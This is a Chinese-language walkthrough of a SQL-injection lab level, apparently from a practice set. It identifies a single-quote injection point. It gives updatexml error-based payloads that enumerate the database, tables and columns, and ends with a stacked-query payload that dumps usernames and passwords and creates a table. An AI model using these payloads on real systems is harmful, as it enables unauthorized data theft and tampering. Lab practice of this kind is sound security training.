这一关有变成了get请求的题目了

我们先判断一下是否属于数字型注入 输入如下

id=1 and 1=2

回显如下

属于字符型

然后判断一下是单引还是双引 输入1'

报错了 从报错信息可知 这是一个单引号注入型 我们去佐证一下呗 输入1'--+

回显如下

 可以 确实是单引号注入型

然后我选择使用报错注入

首先 爆库 输入如下

id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

 回显如下

然后爆表 输入如下

id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

 回显如下

接着进行爆字段操作 输入如下

id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)--+

 回显如下

看到这里我才知道原来这道题要考我们堆叠注入啊

爆用户名我顺便操作一下这个堆叠注入吧 输入如下

id=0' union select 1,2,group_concat(username,password) from users;create table demo like users--+

 回显如下

然后去数据库中查查看有无我刚才新创建的表格demo

 测试成功 通关成功 嗨嗨！！